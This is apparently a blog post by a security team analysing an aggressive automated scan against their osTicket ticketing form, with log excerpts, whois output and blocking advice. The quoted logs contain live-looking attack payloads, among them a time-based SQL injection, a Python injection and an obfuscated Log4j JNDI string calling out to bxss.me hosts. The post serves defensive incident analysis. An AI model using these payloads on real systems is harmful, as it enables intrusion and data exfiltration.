Skip to main content

Can I help you, Mr. Bad Bot?

· 5 min read

Everybody knows the Internet is full of crawlers, bots, scanners and other opportunistic traffic. This is not breaking news, but sometimes you come across a scanner so aggressive it makes you think you are actively targeted for a second.

We first noticed this particularly aggressive scan on our support ticketing platform during September 2024, with over 18 000 requests in the span of 20 minutes from 52.86.221.173.

[root@server tmp]# cat osticket_syslog.txt | grep 52.86.221.173 | grep 2024-09-07 | less | wc -l
18546

The scanner was fuzzing the new ticket form, but it couldn't figure out how to use the CSRF token, since all the logs were for an invalid CSRF token.

52.86.221.173   2024-09-07 21:41:57     Invalid CSRF token [c4264157534f1acc5c9a36b88aab9f3dc25c11b9] on https://[REDACTED]/open.php
52.86.221.173   2024-09-07 21:41:57     Invalid CSRF token [c4264157534f1acc5c9a36b88aab9f3dc25c11b9] on https://[REDACTED]/open.php
52.86.221.173   2024-09-07 21:41:57     Invalid CSRF token [c4264157534f1acc5c9a36b88aab9f3dc25c11b9] on https://[REDACTED]/open.php
52.86.221.173   2024-09-07 21:41:57     Invalid CSRF token [c4264157534f1acc5c9a36b88aab9f3dc25c11b9] on https://[REDACTED]/open.php
52.86.221.173   2024-09-07 21:41:57     Invalid CSRF token [c4264157534f1acc5c9a36b88aab9f3dc25c11b9] on https://[REDACTED]/open.php
52.86.221.173   2024-09-07 21:41:57     Invalid CSRF token [c4264157534f1acc5c9a36b88aab9f3dc25c11b9] on https://[REDACTED]/open.php
52.86.221.173   2024-09-07 21:41:57     Invalid CSRF token [c4264157534f1acc5c9a36b88aab9f3dc25c11b9] on https://[REDACTED]/open.php
52.86.221.173   2024-09-07 21:41:58     Invalid CSRF token [c4264157534f1acc5c9a36b88aab9f3dc25c11b9] on https://[REDACTED]/open.php
52.86.221.173   2024-09-07 21:41:58     Invalid CSRF token [c4264157534f1acc5c9a36b88aab9f3dc25c11b9] on https://[REDACTED]/open.php
52.86.221.173   2024-09-07 21:41:58     Invalid CSRF token [c4264157534f1acc5c9a36b88aab9f3dc25c11b9] on https://[REDACTED]/open.php
52.86.221.173   2024-09-07 21:41:58     Invalid CSRF token [c4264157534f1acc5c9a36b88aab9f3dc25c11b9] on https://[REDACTED]/open.php
52.86.221.173   2024-09-07 21:41:58     Invalid CSRF token [c4264157534f1acc5c9a36b88aab9f3dc25c11b9] on https://[REDACTED]/open.php
52.86.221.173   2024-09-07 21:41:58     Invalid CSRF token [c4264157534f1acc5c9a36b88aab9f3dc25c11b9] on https://[REDACTED]/open.php

What makes it obvious this is just an aggressive scan and not a targeted attack is the lack of technology identification. The attempts ranged from XSS and SQL injection to SSTI and path traversals. There were even some Log4j exploitation attempts in there.

[...]
52.86.221.173   2024-08-24 16:15:58     Invalid CSRF token ['+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitjninzrcvuhec149."+"bxss.me")+'] on https://[REDACTED]/open.php
[...]
52.86.221.173   2024-09-07 21:46:06     Invalid CSRF token [(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/] on https://[REDACTED]/login.php
[...]
52.86.221.173   2024-09-07 21:57:25     Invalid CSRF token [${j${::-n}di:dns${::-:}${::-/}${::-/}hitnjcedohhyn07a72${::-.}bxss.me}zzzz${url:UTF-8:http://hitivynwrnhqr.bxss.me/}] on https://[REDACTED]/open.php
[...]

Taking a look at the IP the requests were coming from, we can see it belongs to AWS, most probably an EC2 instance.

➜ whois 52.86.221.173

#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/resources/registry/whois/tou/
#
# If you see inaccuracies in the results, please report at
# https://www.arin.net/resources/registry/whois/inaccuracy_reporting/
#
# Copyright 1997-2024, American Registry for Internet Numbers, Ltd.
#


NetRange:       52.84.0.0 - 52.95.255.255
CIDR:           52.88.0.0/13, 52.84.0.0/14
NetName:        AT-88-Z
NetHandle:      NET-52-84-0-0-1
Parent:         NET52 (NET-52-0-0-0-0)
NetType:        Direct Allocation
OriginAS:       AS16509, AS14618
Organization:   Amazon Technologies Inc. (AT-88-Z)
RegDate:        1991-12-19
Updated:        2022-03-21
Ref:            https://rdap.arin.net/registry/ip/52.84.0.0



OrgName:        Amazon Technologies Inc.
OrgId:          AT-88-Z
Address:        410 Terry Ave N.
City:           Seattle
StateProv:      WA
PostalCode:     98109
Country:        US
RegDate:        2011-12-08
Updated:        2024-01-24
Comment:        All abuse reports MUST include:
Comment:        * src IP
Comment:        * dest IP (your IP)
Comment:        * dest port
Comment:        * Accurate date/timestamp and timezone of activity
Comment:        * Intensity/frequency (short log extracts)
Comment:        * Your contact details (phone and email) Without these we will be unable to identify the correct owner of the IP address at that point in time.
Ref:            https://rdap.arin.net/registry/entity/AT-88-Z


OrgRoutingHandle: IPROU3-ARIN
OrgRoutingName:   IP Routing
OrgRoutingPhone:  +1-206-555-0000
OrgRoutingEmail:  aws-routing-poc@amazon.com
OrgRoutingRef:    https://rdap.arin.net/registry/entity/IPROU3-ARIN

OrgNOCHandle: AANO1-ARIN
OrgNOCName:   Amazon AWS Network Operations
OrgNOCPhone:  +1-206-555-0000
OrgNOCEmail:  amzn-noc-contact@amazon.com
OrgNOCRef:    https://rdap.arin.net/registry/entity/AANO1-ARIN

OrgAbuseHandle: AEA8-ARIN
OrgAbuseName:   Amazon EC2 Abuse
OrgAbusePhone:  +1-206-555-0000
OrgAbuseEmail:  trustandsafety@support.aws.com
OrgAbuseRef:    https://rdap.arin.net/registry/entity/AEA8-ARIN

OrgRoutingHandle: ARMP-ARIN
OrgRoutingName:   AWS RPKI Management POC
OrgRoutingPhone:  +1-206-555-0000
OrgRoutingEmail:  aws-rpki-routing-poc@amazon.com
OrgRoutingRef:    https://rdap.arin.net/registry/entity/ARMP-ARIN

OrgTechHandle: ANO24-ARIN
OrgTechName:   Amazon EC2 Network Operations
OrgTechPhone:  +1-206-555-0000
OrgTechEmail:  amzn-noc-contact@amazon.com
OrgTechRef:    https://rdap.arin.net/registry/entity/ANO24-ARIN


#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/resources/registry/whois/tou/
#
# If you see inaccuracies in the results, please report at
# https://www.arin.net/resources/registry/whois/inaccuracy_reporting/
#
# Copyright 1997-2024, American Registry for Internet Numbers, Ltd.
#

Furthermore, this IP has already been flagged on AbuseIPDB, with activity reported as early as one year ago (September 2023).

We also looked for this IP in our logs to identify what other things it was targeting and found older activity on multiple services and servers.

Takeaway

It's probably safe to say that you can block this IP without any issues. If it doesn't impact your users you can even block the entire AWS IP block, or even more datacenter IPs through blocklists like the ones provided by FireHOL, but double check that there are no exceptions you need to account for.

SOCcare

The SOCcare project is co-funded by the European Union, alongside our collaborators, NRD Cyber Security and RevelSI, and supported by the European Cybersecurity Competence Centre (ECCC) Centre (ECCC) under Grant Agreement No. 101145843. Views and opinions expressed are however those of the author(s) only and do not necessarily reflect those of the European Union or the European Cybersecurity Competence Centre. Neither the European Union nor the European Cybersecurity Competence Centre can be held responsible for them.